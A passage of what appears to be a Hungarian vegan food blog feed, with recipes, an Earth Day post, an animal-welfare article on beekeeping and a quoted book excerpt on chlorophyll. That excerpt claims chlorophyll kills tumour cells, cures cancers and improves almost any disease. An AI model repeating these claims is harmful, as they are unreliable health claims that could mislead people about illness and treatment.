Amszterdamban kétségtelenül ez a legnagyobb szabású szabadtéri rendezvény, mintegy 750. 000 résztvevővel. A központban a Dam, Damrak, Rokin, Rembrantplein, Spui, Leidsestraat, Leidseplein környékén csak úgy hömpölyögnek az embertömegek." Forrás: http://www.amsterdam.info Ezen a napon az országban mindenfelé szabadon, engedélyek és adófizetés nélkül, lehet árusítani a használt holmikat. Az egész ország egy nagy bolhapiaccá változik egy napra, telis tele értékes és értéktelen lomokkal. Ha időben érkezünk, izgalmas kincsekre lelhetünk! ;-) Mint ahogy korábban az ír zöld napról, zöld menüsorral emlékeztünk meg ezen a blogon, úgy most a narancssárga nap tiszteletére, narancssárga menüsort készítettem nektek! Remélem tetszeni fog! :-) De előbb nézzük, mit is kell tudni a narancssárga színű ételekről? "Narancssárga és a béta-karotin: ,,Fiatalon tart A narancssárga zöldségek és gyümölcsök a béta-karotinnak, vagyis az A-vitamin provitaminjának természetes forrásai. Ennek köszönhetik narancsos árnyalatukat. A szervezetben lévő megfelelő mennyiségű karotin megvédi sejtjeinket a szabad gyökök roncsoló hatásától és a káros UV-sugárzástól, segíti a szép barnulást, lassítja a bőröregedést. Érdemes hát gondoskodni arról, hogy állandóan elég karotin tartalmú ételt fogyassz, mert nagyrészt ennek az anyagnak köszönhetjük szépségünket, fiatalságunkat. A karotin antioxidánst tartalmazó zöldségek és gyümölcsök hatását C vitaminnal együtt még jobban fokozhatod." Forrás: http://impressmagazin.hu Leggyakoribb narancssárga ételek pl.: sárgabarack, sárgadinnye, mangó, sütőtök, sárgarépa, narancs, mandarin. És akkor nézzünk néhány narancssárga ételt, amit az asztalunkra rakhatunk, ha béta-karotinra, azaz fiatalságra vágyunk! :-) reggelire: friss és energiadús "karotin bomba", a trópusi ízvilágú turmix (ananász, sárgarépa, lime, narancs, víz) tízóraira: magyaros tahini, azaz magyaros ízű szezámmag krém (mindenmentes, vegán) ebédre: - mandarinos gyömbéres sárgarépa krémleves (mindenmentes, vegán) - sütőben sült édesburgonyás sárgarépa fasírt, uborkás kuszkusszal (mindenmentes, vegán) - házi készítésű mangós jégkrém (mindenmentes, vegán édesség) nassolni való: narancsos sütőtökös diós kuglóf (glutén-, tojás-, és laktózmentes édesség) narancsos sütőtökös diós kuglóf vacsora: egy könnyed, friss, tápanyagban gazdag Narancsos édesburgonyás fetás, zöld saláta (gluténmentes) HOZZÁVALÓK: (2 személyre) - friss spenót levelek (vagy sötét zöld saláta levél keverék) - 1 nagyobb édes burgonya (vagy sütőtök) - 2 db édes narancs - 4 szem érett koktél paradicsom - 1/2 fej nyers lila hagyma - tetszés szerinti mennyiségben Feta sajt - 1 db érett avokádó - 2-3 szem friss retek - 1 marék pekán dió - 1 nagy marék sós mag: tökmag, naraforgómag, fenyőmag - tetszés szerint: csíra, sörélesztő pehely, kendermag ELKÉSZÍTÉS:Az édesburgonyát (vagy szezontól függően sütőtököt), meghámozzuk, kb.2*2 cm-es kockákra vágjuk, és előmelegített sütőben 220°C fokon aranybarnára sütjük, majd hagyjuk kihűlni. A zöldségeket (retek, paradicsom, lila hagyma, avokádó) és a narancsot feldaraboljuk tetszés szerinti méretben és formában. Elővesszük a két tányért, amikre a salátákat kiszeretnénk tálalni. Alulra helyezzük a spenót vagy zöld levél mix réteget. Rászórjuk a feldarabolt zöldségeket, fetát, a kihűlt édesburgonyát, a marék pekán diót és sós magokat, tetszés szerint csírát. Majd egy narancs frissen facsart levével megöntözzük a salátákat. És kész is az egyszerű és könnyű vacsoránk! :-) Tápanyagban gazdag Jó étvágyat kívánunk! ;-) Megjegyzés1: Természetesen nem tanácsos ezt a narancssárga menüsort pontosan így végig enni. Ezek az ételek csak ajánlások, a Zöld Avocado gasztroblog receptjei közül, a narancssárga szín jegyében. Megjegyzés2: A képek még az őszi sütőtök szezonban készültek, ezért sütőtököt használtam a salátához. Most tavasszal, nyugodtan használjunk édesburgonyát, mert ugyanolyan finom lesz.
Magyaros csicsókakrém
Ma kóstoltam ilyent életemben először, és annyira ízlett, hogy itthon tüstént el is készítettem. Végre egy valóban finom, ehető, élvezhető csicsóka recept, amiben a csicsóka tipikusan földes íze nem dominál. Az eredeti recept, amit persze lehet variálni vegánsághoz és nyersevőséghez mérten, következő verzió nálam is egy napraforgómagból, és kesudióból kutyult változat lesz a sajtos helyett. Hozzávalók: 50 dkg csicsóka, 20 dkg natúr vagy tejszínes sajtkrém, 3 evőkanál tejföl, 2-3 gerezd fokhagyma, fél fej vöröshagyma vagy 1 újhagyma, 1 evőkanál mustár, 2 púpozott teáskanál édesnemes őrölt pirospaprika, 1 kiskanál őrölt kömény, só, bors, petrezselyemzöld, ízlés szerint egy kevés erős darált paprika. Elkészítés: A csicsókát megtisztítjuk, és sós vízben megfőzzük. Amikor kihűlt, külső részét lehámozgatjuk, majd a belsejét villával pürésítjük. Hozzáadjuk a krémsajtot, a tejfölt, a mustárt, majd az apróra vágott fokhagymát, vöröshagymát/újhagymát. Ízesítjük pirospaprikával, őrölt köménnyel, sóval, borssal és kevés erős darált paprikával (kihagyható). Végül apróra vágott petrezselyemzöldet adunk hozzá. Az egészet jól elkeverjük, és 2-3 órára hűtőszekrénybe tesszük, hogy az ízek jól összeérjenek. forrás: nakicsicsoka.hu reklámprospektusa Lehet kenyérre kenni, vagy karikákra vágott cukkini karikákra, krékerekre.
"... a napfény folyékony formájáról, a klorofillról" - receptmentes bejegyzés
Itt a tavasz! Végre kisütött a nap! :-) Szóljon ez a bejegyzés a napról, és a klorofillról, amiről talán a középiskolai biológia órán halottunk utoljára. Pedig fontos ismernünk ezt az értékes anyagot, ha egészségesen szeretnénk táplálkozni. A bejegyzés Victoria Boutenko: A nyers étel csodája c. könyvéből származó idézet. Fogadjátok sok szeretettel! ;-) "... a napfény folyékony formájáról, a klorofillról""Minél hosszabb ideje élek, annál mélyebb csodálatot érzek a természet iránt. Amikor reggelente kisétálok az erdőbe, és megpillantok egy szarvast vagy mókust, mozdulatlanná válva, lelkesen szívom magamba a látványt, mintha abban a pillanatban semmi más nem számítana. az állatok, a virágok, a fák és különösen a napfény sugarai misztikus élményt jelentenek számomra. Amikor a napra tekintek az jár az eszemben: "milyen csodálatos, hogy a napfény ingyen van, és mindenki számára egyenlő mértékben hozzáférhető!" Sokan élvezik a napfényt. Mindannyian jobban érezzük magunkat, és egészségesebbnek nézünk ki, ha valamennyi időt rendszeresen a napon tartózkodunk. Igyekszünk ilyenkor annyi napfényt magunkba szívni, amennyit csak lehet. Ám kevesen tudnak a napfény folyékony formájáról, a klorofillról. A klorofill ugyanolyan fontos, mint a napfény! Nem létezhetne élet napfény nélkül, és nem létezhetne élet klorofill nélkül. A klorofill lényegében folyékony napenergia. A sok klorofill fogyasztása olyan, mintha szerveinket napfényben fürdetnénk meg. A klorofillmolekula nagyon hasonló az emberi vérben lévő hemoglobin hem-molekulájához. A klorofill úgy vigyáz a testünkre, ahogy egy gondoskodó és szerető anya teszi. Valamennyi szervünket pucolja és gyógyítja, sőt el is tudja pusztítani a legtöbb kórokozó baktériumot és gombát, valamint a daganatsejteket , és még számos egyéb pozitív hatása is van. .... A klorofill ősidők óta szolgál csodálatos gyógyítóként. Jelentős mennyiségű oxigént hordoz magában, ezért kritikus szerepet játszik az aerob baktériumok támogatásában. Tehát minél több klorofillt eszünk, annál egészségesebb lesz a bélflóránk, és így mi magunk is. Mivel a zöld levelek a klorofill egyik fő forrása, nehéz jobb módot találnunk a klorofill bevitelére, mint a zöld turmixok rendszeres fogyasztása. "... a napfény folyékony formájáról, a klorofillról" A klorofill bizonyítottan pozitív hatású a rák számos fajtájának és az érelmeszesedésnek a megelőzése és gyógyítása szempontjából. Számtalan tudományos kutatási eredmény bizonyítja, hogy alig létezik olyan betegség, amelynél ne lehetne a klorofillal javulást elérni. Ha a klorofill valamennyi pozitív hatásáról szólni kívánnék, egész könyvet kellene írnom. Ezért e bámulatos anyag számos gyógyító jellemzője közül csak néhányat sorolok itt fel. A klorofill: - Javítja a vérképet. - Segít a rák megelőzésében. - Vasat juttat a testbe. - Lúgosabbá teszi a szervezetet. - Közömbösít számos, a táplálékkal a testbe bevitt mérget. - Enyhíti a vérszegénységet. - Tisztítja és szagtalanítja a beleket. - Segíti a máj tisztulását. - Jótékonyan hat a menstruációra. - Fokozza a tejelválasztást. - Gyorsítja a sebek gyógyulását. - Megszünteti a testszagot, - Tisztítja és erősíti a fogínyt. - Megszünteti a rossz szájszagot. - Enyhíti az aranyér okozta fájdalmakat. - Enyhíti a visszeresség okozta panaszokat. - Javítja a látást. ... A bolygónkon létező minden létforma legfontosabb célja: élete fenntartása. Nekünk embereknek vajon mire van szükségünk az életben maradáshoz? Levegőn és vízen kívül elsősorban táplálékra, amit a növényektől és az állatoktól kapunk meg. És honnan kapják táplálékukat a növények? A termőtalajból és a napfényből. Kizárólag a növények rendelkeznek azzal a "tudással", hogy miként kell a napfényt szénhidráttá alakítani. Ez a "tudás" segíti őket a növekedésben. A napfény segítségével szénhidrátot készítenek, a szénhidrátból friss szárat, gyökeret, kérget és - ami talán a legfontosabb - új leveleket. Miért a legfontosabb? Mert a levelek újabb szénhidrátmennyiséget képesek gyártani. Ez a magyarázata annak, hogy a levelek tömege mindig felülmúlja a növény többi részeinek tömegét. A zöld levelek folyton fokozni igyekeznek klorofillmennyiségüket, folyamatosan növekednek. Ezért kell állandóan nyírni a kertünkben a bokrokat és a füvet. Máskülönben ezek a zöld növények idővel elfoglalnák a teljes területet, s nem hagynának helyet nekünk, embereknek. A növények életet a napfénytől függ, a mi életünk pedig a növényektől. ... Viszont nincs olyan élőlény - még a húsevők között sem -, amelyik hosszú ideig életben maradna zöld növényi részek fogyasztása nélkül. Mindannyian láttunk már kutyát vagy macskát alkalmanként füvet enni. Nagy klorofill- és ásványianyag- tartalmuk miatt a zöld levelű növények a bolygónkon föllelhető legjobb lúgosító élelmiszerek. Ha zöld turmixokkal egészítjük ki étrendünket, szervezetünket lúgosan és egészségesen tarthatjuk. " Forrás: Victoria Boutenko : A nyer sétel csodája c. könyv zöld smoothie
A Föld Világnapja és a Csoki krémes szőlő torta, zöld tésztával (glutén- és laktózmentes) (zöld menüsor Szent Patrik napon 4.rész)
2015. április 23. Zöld Avocado
Tegnap, 2015. Április 22-én ünnepelte a 25. évfordulóját a magyarországi Föld napja mozgalom, és ez a 45. évfodulója volt a Föld napja világmozgalomnak ! :-) Ezt megünnepelvén hoztam nektek egy nagyon látványos és finom torta receptet, telis tele mindenféle "földi jóval". ;-) csoki krémes szőlő torta, zöld tésztával De előbb egy kicsit arról, mi is az a Föld Napja?! "Az első Föld napján, Denis Hayes amerikai egyetemista kezdeményezésére, 1970. április 22-én 25 millió amerikai emelte fel szavát a természetért. Ez a történelmi jelentőségű esemény az Egyesült Államokban - és az ország határain túl is - fontos változásokat hozott: az USA-ban szigorú törvények születtek a levegő és a vizek védelmére, új környezetvédő szervezetek alakultak, és több millió ember tért át ökológiailag érzékenyebb életvitelre. 1990-BEN VILÁGMOZGALOMMÁ VÁLT, és MAGYARORSZÁG AZ ELSŐK KÖZÖTT CSATLAKOZOTT. A kezdettől, 1970-től 2010-ig eltelt 40 évben a Föld napja világméretű megmozdulássá vált: több mint egymilliárd ember vesz részt valamilyen környezeti eseményen ezen a napon. A nemzetközi Föld Napja Hálózat 174 országban több mint 15 000 szervezettel dolgozik azon, hogy kialakítsák "az egyetlen eseményt, amelyet az egész világon egyszerre ünnepelnek, mindenféle származású, vallású és nemzetiségű emberek". Forrás: Föld Napja Alapítvány csoki krémes szőlő torta, zöld tésztával A Föld Napja Alapítvány meghirdette az évi egy helyett, a heti egy Föld napját, hogy egymást segítve váltsunk egy hosszú távon fenntartható életmódra! Mik is ezek a kihívások, melyek közül te is könnyedén választhatsz és megvalósíthatsz egyet, kettőt, vagy akár többet is??? 1.heti kihívás: Pihentesd a kocsit. Hetente legalább 3-szor mondj le az autóról, és helyette gyalogolj, bringázz, rollerezz vagy tömegközlekedj! 2.heti kihívás: Kisebb ökológiai lábnyom, heti 1 húsmentes nappal! 3.heti kihívás: Légy klímabajnok heti 3 vegán nappal! 4.heti kihívás: Éheztesd a kukát! (kevesebb ételt a kukákba) 5.heti kihívás: Komposztálj! 6.heti kihívás: Ne fogadj el nejlonzacskót a boltokban! Vászontáska, kosár, textiltasak... 7.heti kihívás: Igyál csapvizet, palackozott helyett! 8.heti kihívás: Használj környezetkímélő tisztítószereket! 9.heti kihívás: Kevesebb élelmiszer-kilométer: vegyél helyi termékeket, támogasd a helyi farmereket! 10.heti kihívás: Ültess haszonnövényeket! Bővebben a kihívásokról és arról, hogy hogyan tudjuk élhetőbbé tenni a bolygónkat, itt olvashattok: http://fna.hu/mittehetsz/hetikihivas csoki krémes szőlő torta, zöld tésztával És akkor vissza a recepthez... Habár jelenleg egyáltalán nincs szőlő szezon, és ez a szőlős torta egy másik, korábbi jellegzetes ír napra készült, amikor minden étel zöld színű volt nálunk, azért mivel már régóta ígérem, hogy megosztom veletek ezt a receptet, úgy gondoltam nem bánjátok, ha egy kicsit összekötöm a különböző eseményeket egy bejegyzésben. :-) A nyers csoki krémes szőlő tortának nem csak a dekorációja, de a tésztája is zöld színű. A krém pedig egy nyers csoki krém, ami tökéletesen kiegíszíti a szőlő ízét. A kivis és a szőlős torta között dilemmáztam, és végül ez lett belőle. :-) És, hogy hogyan is lehet egy süti tészta zöld színű egészségtelen mesterséges színezék nélkül??? Erre több válasz is lehetséges. Manapság elég sok receptet látni, ahol japán Matcha teával színezik a süteményeket. Egészséges, finom és igen szép zöld színt lehet kapni végeredményül. Azonban elég drága hozzávaló, egy átlagos desszerthez. Gondolkoztam mi mást használhatnék helyette? Kutatgattam, keresgéltem, és végül a spenót mellett döntöttem! Spenót az édességbe? :-o Igen, spenót az édességbe. :-) Egyáltalán nem érezni a spenót levelek ízét a tésztában, és nagyon szépen, természetes módon megszínezték a torta lapokat. Ha nem mondom meg mi van benne, észre sem lehet venni. ;-) Hát akkor nézzük ezt az igen látványos, egészséges, könnyen emészthető. tápanyagban gazdag, de magas kalóriatartalmú, nem mindennapi tortát! :-) csoki krémes szőlő torta, zöld tésztával HOZZÁVALÓK: a torta laphoz: - 150 g kókusz liszt - 150 g mandula liszt - 1 tk szódabikarbóna - 1 csipet Himalája só - 120 g Xilit / nyírfacukor vagy nádcukor (porcukorrá darálva) - 2 bio tojás - 1 frissen facsart citrom leve és héja reszelve (kezeletlen héjú citrom) - 200 ml kókusz tej - 1 marék friss spenót levél kb.0,5 dl vízzel összeturmixolva a krémhez: - kb.50 szem zöld szőlő leturmixolva + szőlőszemek a dekoráláshoz - 3 db érett avokádó húsa - 2 db érett banán - 30 g kókusz olaj - 50 g karob por vagy jó minőségű cukrozatlan kakaó por - 1 ek útifűmaghéj csoki krémes szőlő torta, zöld tésztával ELKÉSZÍTÉS:A torta lap száraz és nedves hozzávalóit külön-külön összekeverjük, majd az egészet összeöntjük, és egyneművé keverjük. Elővesszük a kapcsos torta formánkat, és kikenjük kókusz zsírral. (Én sütőpapírral is ki szoktam bélelni, biztos ami biztos alapon.;-) ) A sütőt előmelegítjük 180 °C -ra, majd 35 perc alatt készre sütjük a torta lapot. Miután elkészült, hagyjuk kihűlni a formában, majd vágjuk ketté vízszintesen, hogy két lapot kapjunk. A krémhez turmixoljuk le az érett és nyers avokádókat a banánokkal. Majd keverjük hozzá az előre leturmixult szőlőt, a kókusz olajat, a karob port és az útifűmaghéjat. alaposan keverjük össze, majd a krém egyik felével kenjük meg a két torta lap közötti részt, majd a torta tetejét is. Friss, felkarikázott szőlőszemekkel díszithetjük a nyers csoki krémes tortánkat. Tegyük a hűtőbe 2-3 órára, majd fogyaszthatjuk is a rendhagyó, glutén- és laktóz mentes szőlős édességünket! csoki krémes szőlő torta, zöld tésztával Táplálkozz, ne csak étkezz! Megjegyzés1: Nem vagyok rutinos torta készítő, de most már tudom, hogy sokkal mutatósabb lenne ez a recept is, ha magasabb lenne a torta szelet, azaz, ha 4 lapot készítettem volna. Ezért legközelebb dupla adag tésztát készítek, és 4 felé vágom a megsült torta tésztát. :-) Megjegyzés2: Ha pedig szezonális torta receptre vágytok, akkor itt egy korábbi epres avokádó krémes torta recept a Zöld Avocado gasztroblogról.
Lestyános zellerkrémleves
2015. április 20. Éltető ételek
Tudjátok, hogy milyen fűszernövény a lestyán? Én csak nemrég ismerkedtem meg vele, annak ellenére, hogy ez egy igazi magyar fűszernövény és gyógynövény is. Évelő, a kertemben már most nagyon szépen megbokrosodott, egészen fagyokig gyűjthető. Hozzávalók: - 1 kis öklömnyi zeller - 2 közepes krumpli - 1 újhagyma - 1 gerezd fokhagyma - 1 kisebb sárgarépa - 3-4 levél lestyán és petrezselyemlevél - fél zöldségleveskocka - kevéske kókuszolaj - 1 evőkanál zabliszt - kevés zabtejszín - himalája só Elkészítése: - Minden zöldséget tisztítsuk meg, majd daraboljuk fel egyforma méretűre. - Egy lábasba tegyük a kókuszolajat, majd dobjuk rá a hagymát. Egy kevéske idő után mehet a többi zöldség is. Úgy 3-5 percig kavargassuk, majd szórjuk rá a lisztet. - Öntsük fel annyi vízzel, amennyi éppen ellepi. - Sózzuk meg, főzzük puhára. - Tegyünk mindent egy turmixba, és adjuk hozzá a zöld leveleket. - Turmixoljuk simára. - Öntsünk hozzá egy kevéske tejszínt és rottyantsunk egyet rajta.
Mézédes élet? - Haszonállatok a kaptárban
2015. április 20. La Veganista
A háziméhek haszonállatok, akárcsak a sertések vagy a szarvasmarhák. Az utóbbiak kihasználása mind átláthatóbbá válik, míg a méhekéről kevesebbet tudunk, noha termékeiket fogyasztjuk, profitszerzés céljából tenyésztjük, adjuk-vesszük, bizonyos esetekben megöljük őket. Miért vagyunk közönyösek a méhek szenvedése iránt? Csak mert rendszertanilag távol állnak tőlünk, nem indokolt, hogy kevesebb együttérzést mutassunk irántuk, mint egy orangután iránt. A háziméhek magasan fejlett,komplex társadalomba szerveződnek.A kaptárak kisvárosnyi népessége szuperorganizmusként viselkedik, kollektív intelligenciával bír, és az embertől függetlenül képes fenntartani magát. Hatékonyan kommunikálnak feromonokkal, társas viselkedési formáik közül legismertebb a méhtánc. A kaptár helyzete, a nap járása, tereptárgyak, ízek, színek segítségével megalkotják környezetük kognitív térképét, ami alapján tudatos döntéseket hoznak. A méhfélék több mint 20.000 fajtája ismeretes. A paleolitikum barlangrajzain már ábrázolták a mézrabló embert, de a háziasítás 6000 éve kezdődött. Ha a rovarok többségéhez hasonlóan a mézelő méhek nem termelnek mézet és más hasznosítható anyagokat, nem kerül sor a domesztikálásukra. Ahogy a haszonállattartás más területein (pl. tojás, tejipar), itt is főként nőivarú egyedeket (a család 99%-a) zsákmányolnak ki, mivel ők állítják elő az ember által fogyasztott valamennyi méhterméket, melyeket nem tekintünk vegánnak. A méhek természetes táplálékául szolgáló méz elvételekor a feromon kommunikációt hideg füsttel blokkolják, így a méhésznek nem kell támadástól tartania. A rablás járulékos veszteségét a fölözéskor felszínre úszó méhtestrészek bizonyítják. Egyes méhészetek a méhpempőt is gyűjtik, ami az anyabölcsők kiürítését, a bennük lévő lárvák elpusztítását jelenti. A méhpempő begyűjtése, az anyalárvák halálát jelenti A potrohmirigyben termelődő méhviaszt, a kaptár tömítésére, fertőtlenítésére használt propoliszt, az immunrendszert erősítő, szaporodást segítő virágport is elveszik, akárcsak a méhmérget. A méreg kinyerése során az állatot gyenge áramütéssel szúrásra késztetik. Ha gumi hártyába szúr, elpusztul, ha műanyag vagy üveglap fogja fel a mérget, a rovar életben marad, és a procedúra 3-6 naponta ismételhető. A gyógyítás bizarr módja, a méhméreg terápia. A csipesszel megfogott, szúrásra kényszerített méh fullánkja és méregmirigye a potrohból kiszakadva a páciens bőrében marad, így az állat elpusztul. A méhméreg terápia a méhekre nézve halálos A dolgozó egész életében 0,6 g mézet gyűjt, 1 kg méz előállításához a kaptárlakók együttesen kb. 4.000.000 virágot látogatnak, 120.000 km-t tesznek meg, ezzel háromszor repülhetnék körbe a Földet A méhtársadalom életébe a profitszerzés érdekében számos ponton beavatkoznak. A családok stressz szintjét növeli a fiasítások háromhetenkénti felülvizsgálata. A beteg kolóniákat elpusztítják, de a fertőzésgyanús kaptárakban termelt méz és viasz ipari felhasználásra még jó. Az álanyás családokat kiszórják a kaptárból. A gyenge családok anyáit megölik, és más kolóniákkal egyesítik. Létezik anya nélküli mézeltetés is, bár a családot legyengíti, sok és könnyen elvehető mézet jelent. Az anya elvesztése extrém stresszhelyzettel járó beavatkozás a méhcsalád életébe, amit a méhek ,,sírással, hangos szárnyrezegtetéssel jeleznek. A királynőt megölni nem kell félnetek, jó lesz A méhészek nem bízzák a véletlenre a tenyésztést, ami állománynövelést, tartalékcsalád képzést és eladást tesz lehetővé. Használhatnak saját nevelésű anyákat,vagy dajkacsaládokkal foglalkozó méhészetből érkező, anyazárkában raboskodó anyákat helyeznek a kaptárba. Vannak, akik a régi anya testét a zárka falára kenik,hogy a család elfogadja a ,,betolakodót. Az új anya speciális tulajdonságokat szelektáló laboratóriumból is származhat, ahol szén-dioxiddal kábított méhanyák mesterséges megtermékenyítésével foglalkoznak a heréktől begyűjtött spermával. Inszemináció - mesterséges megtermékenyítés A mesterséges szaporítás széleskörű elterjedése csökkenti a génvariabilitást, beltenyészet kialakulásához vezet. A nagy távolságról érkező állatokat postán adják fel a megrendelőnek. Szállítás közben az idegen zajok, szagok, rezgés, változó hő és páratartalom stresszforrás a rovar számára. Az anyásítás nem kis tortúra a méheknek, és az ,,öreg anya halálát jelenti. Anyazárkában raboskodó anya Bizonyos viselkedési formáik nem kívánatosak, ezért például megakadályozzák a család rajzását, mert az elrepülő raj dolgozói mézgyomrukban akár 60 dkg mézet is magukkal vihetnek, illetve termelés kiesést jelent a távozásuk. A rajzásgátlás módszerei: fészekhűtés, mézelvétel, az anya szárnyának csonkolása, anyátlanítás, vagy anyazárka használata, rajbölcsők 5-6 naponkénti elpusztítása. Emellett terjedőben van az anyahelyettesítő feromon kapszula, ami a családot a kaptárban tartja, de halálra is ítéli, mivel többé nem anyásítható, így szaporodásra képtelen. Az anya szárnyának csonkolása mindennapos gyakorlat Súlyos problémát okoz, hogy a nektár és pollen fogyasztásra adaptálódott méheket számukra értéktelen takarmányokkal táplálják. Cukoretetéssel, állatkísérletes, esetenként GMO-s méhtakarmánnyal,szójaliszttel, fölözött tejporral, húsliszttel, tojásporral pótolják az elrabolt mézet és a virágport. A pótszerek azonban hasmenést okoznak és utat nyitnak a fertőzéseknek. A cukor ráadásul üres kalóriákat tartalmaz, nincs benne semmi tápláló, a méhek számára olyan, mintha gyorsétellel etetnék őket. 2012. évi adatok szerint a méhészetek száma hazánkban: 20.410 db. Méhcsaládok száma: 1.088.590 db, ezt érdemes megszorozni átlagosan 40-50.000 egyeddel családonként, hogy hozzávetőleges becslésünk legyen a kaptárakban élő méhek számáról. Az EUban méhcsalád-sűrűség tekintetében 2. helyen állunk - 11 méhcsalád/Km2. A magyar méztermelés (20-25.000 tonna méz) 65-70%-át a vándorméhészetek termelik. A monokultúrákra és a méz iránti kereslet növekedésére a kereskedelmi méhészet a hozamnövelő vándorméhészettel válaszol. Ez a kaptárak utaztatását jelenti a méhlegelők között. A szállítás stresszeli a méheket, a kaptár és a keretek, folyamatos rázkódása nyugtalanítja őket. A szakszerűtlen utaztatás: a szellőztetés és vízutánpótlás hiánya, túlmelegedés vagy baleset miatt a családok elpusztulhatnak, esetleg kiszabadulhatnak. A vándorlás ráadásul elősegíti a méhbetegségek terjedését. A szintén kereskedelmi céllal működő bioméhészetek hasonló módon anyásítanak, vándoroltatnak. A kihasználás azzal a különbséggel történik, hogy kevesebb mézet vesznek el a méhektől, akiket részben saját mézzel és biocukorral etetnek. Antibiotikumok helyett természetes anyagok pl. hangyasav, oxálsav, tejsav, illóolajok használatával próbálják leküzdeni a méhbetegségeket. A kolóniák nem csak kényszerűen vándorolnak, de ott vannak a kutató laboratóriumokban is. Számítógépek segítségével modellezik a viselkedésüket.Növényvédő szerek, méhtakarmányok hatását, idegrendszerüket,érzékelésüket, genetikai tulajdonságaikat vizsgálják, élveboncolást végeznek rajtuk. Nem könnyíti meg a családok életét az sem, hogy a modern mezőgazdaság monokultúrákra és az I. világháborúban bevetett kémiai fegyverekből kifejlesztett növényvédő, rovarirtó szerekre épül. A vegyszerek megölik vagy legyengítik a méheket. Az abnormálisan magas méhsűrűség, a mesterségesen felduzzasztott, helyenként belterjes populációk fogékonyabbak a parazita fertőzésekre, amiket szintén vegyszerekkel kezelnek. A méhek sajátos genomjuk miatt korlátozottan képesek a toxinsemlegesítésre. Mivel minden szennyezőanyagot a kaptárba hordanak, ami a talajban, a vízben, növényekben található, vagy amivel kezelik őket, ezek termékeikben is megjelenhetnek. A méhpempőt és a mézet antibiotikumok, a viaszt atkaölők, a propoliszt atkaölők és ólom, a virágport peszticidek szennyezhetik. A növényvédő szerek a méhek központi idegrendszerét támadják. Méhekre ragasztott rádióantennákkal követik a rovarok rendellenes mozgását Világszerte tapasztalt tömeges pusztulásukért (kaptárelhagyási szindróma vagy CCD) elsősorban a növényvédő szereket, különösen a neonikotinoidokat tartják felelősnek. Azonban más faktorok is súlyosbítják a helyzetet, melyek mind az emberi beavatkozás következményei: virágzó növény nélküli területek, alultápláltság, parazita fertőzések, antibiotikum-használat, a vándorlás okozta stressz, és a monokultúrás növénytermesztés, mely 1-2 héten keresztül szolgál táplálékkal, az év többi részében élelmiszer sivatag a méhek és más beporzók számára. Mit tehetünk a méhekért? Legkézenfekvőbb az, ha nem vesszük el tőlük természetes táplálékukat és a többi méhterméket, ami egészségüket, túlélésüket biztosítja. Pozitív változást hozhat, ha nem tekintjük nagyszámú, költöztethető, irányítható, profittermelő rabszolgának őket. Tudomásul kell vennünk, hogy a túlnépesedés miatt évről-évre több élelemre lesz szükségünk. Élelmiszereink harmada beporzás nélkül nem terem meg. Bolygónk nagy részén a mézelő méhek átvették más beporzó rovarok szerepét. Mezőgazdaságunkat függővé tettük tőlük, miközben egyre több olyan módszert alkalmazunk, ami ellenük dolgozik. Nem kérdés, hogy túlélésük érdekében csökkenteni kell a monokultúrás, vegyszerekkel mérgezett mezőgazdasági területeket. Virágokban gazdag, biodiverzitást megőrző területeket kell kialakítanunk a városokban és a városokon kívül. Magad is ültethetsz nekik vadvirágokat, gyógynövényeket, rozmaringot, zsályát, citromfüvet. Hagyd a pázsit közt virágzani a martilaput, pitypangot, százszorszépet, lóherét, vörös herét. Biztosíts sekély, tiszta vizet a kertedben, erkélyeden a vízgyűjtéshez. Kerüld a növényvédő, rovarirtó szerek használatát a kertedben, ami a háziméheken kívül a vadon élő beporzókat is veszélyezteti. Készíts rovarhoteleket, beporzóknak (vadméhek - különösen poszméhek, kőművesméh, molyok, bogarak, lepkék) és természetes kártevőirtóknak (katicák, fülbemászók,fátyolkák, poloskák, darazsak). Rovarhotel Szavazz a villáddal, támogass olyan élelmiszer termelő rendszert, ami segít táplálni, életben tartani a méheket, mint a vegyszermentes, organikus, diverzifikált farmok. Végül fontold meg, hogy a méhek váladékának fogyasztása megéri-e a kaptárban élő haszonállatok szenvedését, pusztulását. Mi ugyanis képesek vagyunk életben maradni méz nélkül, de ők nem. A cikket a Veganinja Magazin áprilisi számában publikáltam.
Olajkímélő, sütőben sült spenótos bundáskenyér, friss piros zöldségsalátával (zöld menüsor Szent Patrik napon 3.rész)
2015. április 18. Zöld Avocado
Van az úgy, hogy az otthoni kenyér már nem eléggé friss... Esetleg maradt a korábban készített sokmagos házi kenyérből, és szívesen ennénk egy kis bundáskenyeret, de nincs túl sok időnk a konyában állni? Akkor ez a recept a tökéletes megoldás! :-) Korábban már készítettem itt a blogon bundáskenyeret házi padlizsánkrémmel, de most valami teljesen mást hoztam nektek! sütőben sült spenótos bundáskenyér A sütőben sült spenótos bundáskenyér ötlete valahogy így született... Megkívántuk a bundáskenyeret, de semmi kedvem nem volt a serpenyő mellett állni órakat, és a tojásban egyenként megforgatott kenyér szeleteket, egyenként kisütögetni a szanaszét fröcsögő olajban. Ráadásul amióta sokkal több nyers zöldséget és gyümölcsöt eszünk, jobban odafigyelünk a táplálkozásunkra, egyre kevésbé esnek jól a bő olajban sütögetett, nehéz ételek. Mostanában amit csak lehet, zsiradékmentesen, sütőben készítek el, így is elősegítve a könyedebb emésztést, a gyomorkímélő alacsony olaj bevitelt. Elgondolkoztam azon, mi is valójában a bundáskenyér? Kenyér és tojás. Semmi más. Hogy is lehetne ezt gyorsan, egészségesebben és zöldebben megoldani? Például így... ;-) HOZZÁVALÓK (4 személyre) :sült spenótos bundáskenyérhez: - kb. 200 g tömörebb, telt kenyér (pl.: teljes kiőrlésű tönkölybúza kenyér) - 8 tojás - 2 marék friss spenótlevél - 2 szál snidling / póréhagyma - Himalája só, frissen őrölt fekete bors - 4 ek szezámmag - tetejére plusz tápanyagtartalom: sörélesztő pehely és/vagy kendermag (elhagyható) - köretként friss roppanós saláta: paradicsom, pritamin paprika, retek, sárgarépa a piros salátához: Tetszés szerinti mennyiségben paradicsom, piros vastaghúsú pritamin paprika, sárgarépa és retek. "A spenót igen sok karotinoidot tartalmaz, például béta-karotint, ami az A-vitamin előanyaga. A lutein nevű antioxidáns hatású karotinoidból is sok van benne. Számos vizsgálat szerint a sötétzöld levélzöldségek rendszeres fogyasztása némi védelmet nyújt többféle rákbetegséggel szemben.A spenót hasznos folsavforrás is, ezért fogyasztása különösen ajánlott terhes nők számára, mivel segít megelőzni a velőcső-záródási rendellenességeket. A népi gyógyászatban spenótot ajánlottak magas vérnyomás, vérszegénység és székrekedés ellen. A spenót sok káliumot tartalmaz, ez az elem fontos szerepet játszik a vérnyomás szabályozásában. Tévhit, hogy a spenót sok vasat tartalmaz, viszont, ha nem magában 